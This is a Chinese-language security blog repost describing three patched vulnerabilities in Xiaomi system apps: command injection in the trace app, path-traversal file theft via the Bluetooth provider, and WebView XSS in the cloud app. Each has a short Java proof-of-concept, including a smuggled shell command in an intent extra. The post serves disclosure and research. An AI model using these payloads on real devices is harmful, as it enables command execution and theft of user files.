小米设备存在的几个命令执行漏洞 已提交修复

admin 2024年10月28日23:25:09评论40 views字数 1175阅读3分55秒阅读模式

下文来源 :oversecured.com

系统跟踪应用程序 的过度安全扫描报告包含以下漏洞:com.android.traceur

小米设备存在的几个命令执行漏洞  已提交修复

系统跟踪应用程序的过度安全扫描报告包含以下漏洞:

com.android.traceur

POC:

Intent i = new Intent("com.android.traceur.AppReceiver");i.putExtra("ACTION", "traceutil_delete");i.putExtra("ACTION_DELETE_FILE", ".perfetto-trace && log -t evil 1337");sendBroadcast(i);

MIUI 蓝牙 - 使用android.uid.bluetooth权限盗窃任意文件

MIUI 蓝牙应用 的过度安全扫描报告包含以下漏洞:com.xiaomi.bluetooth

小米设备存在的几个命令执行漏洞  已提交修复

该应用程序包括导出的提供程序。它不会以某种方式验证生成的对象,从而允许攻击者执行路径遍历攻击。它还使用标志进行声明,允许它访问具有相同标志和其他一些权限的其他应用程序。com.android.bluetooth.ble.app.headset.HeadsetProvider File android:sharedUserId="android.uid.bluetooth"

POC:

Uri uri = Uri.parse("content://com.android.bluetooth.ble.app.headset.provider/plugin_update/../../../../../sdcard/test.txt");try (InputStream inputStream = getContentResolver().openInputStream(uri)) {    Log.d("evil", IOUtils.toString(inputStream));} catch (Throwable th) {    throw new RuntimeException(th);}

小米云-内置WebView中的XSS

小米云应用程序 的过度安全扫描报告包含以下漏洞: com.xiaomi.mipicks

小米设备存在的几个命令执行漏洞  已提交修复

该文件包含一个不受保护的动态注册的广播接收器,该接收器获取该值,将其连接到 JS 代码,然后执行它。 com/miui/cloudservice/hybrid/ShareLocationHybridActivity.java push_data

POC:

Intent i = new Intent("ACTION_DATA_CHANGED");i.putExtra("push_data", "'-document.write(1337)-'");sendBroadcast(i);

原文始发于微信公众号(合规渗透):小米设备存在的几个命令执行漏洞 -- 已提交修复

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日23:25:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   小米设备存在的几个命令执行漏洞 已提交修复https://cn-sec.com/archives/3324160.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息